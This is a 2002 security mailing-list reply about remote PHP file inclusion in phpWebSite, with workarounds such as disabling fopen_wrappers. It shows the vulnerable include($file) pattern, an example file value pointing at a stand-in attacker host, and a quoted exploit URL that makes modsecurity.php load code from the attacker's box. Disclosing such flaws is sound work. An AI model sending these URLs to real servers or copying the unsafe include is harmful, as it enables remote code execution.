Re: PHP source injection in phpWebSite

[Matthias Bauer <moeffju () moeffju de>]

Just as a side note, quite a lot of sites are open to this kind of
attacks, namely including files from other servers. fopen_wrappers and
unsafe programming are to blame here.

Lots of scripts do

include($file); // $file is in GPC

So if $file is "http://www.cracker.com/somefile.php"; that file gets
included, and php code in it gets executed.

Easy workaround: disable fopen_wrappers in php.ini, or call file_exists
before including any file.

if (file_exists($file)) include($file);

Of course, the only "real" way to fix the bug is to program safely.


On 9/23/2002 1:53 AM Tim Vandermeersch wrote:

> If someone request a URL like
> http://SERVER/modsecurity.php?inc_prefix=http://MYBOX/,
> the htmlheader.php file from MYBOX would be included,
> and the attacker would be able to include any code he
> wants.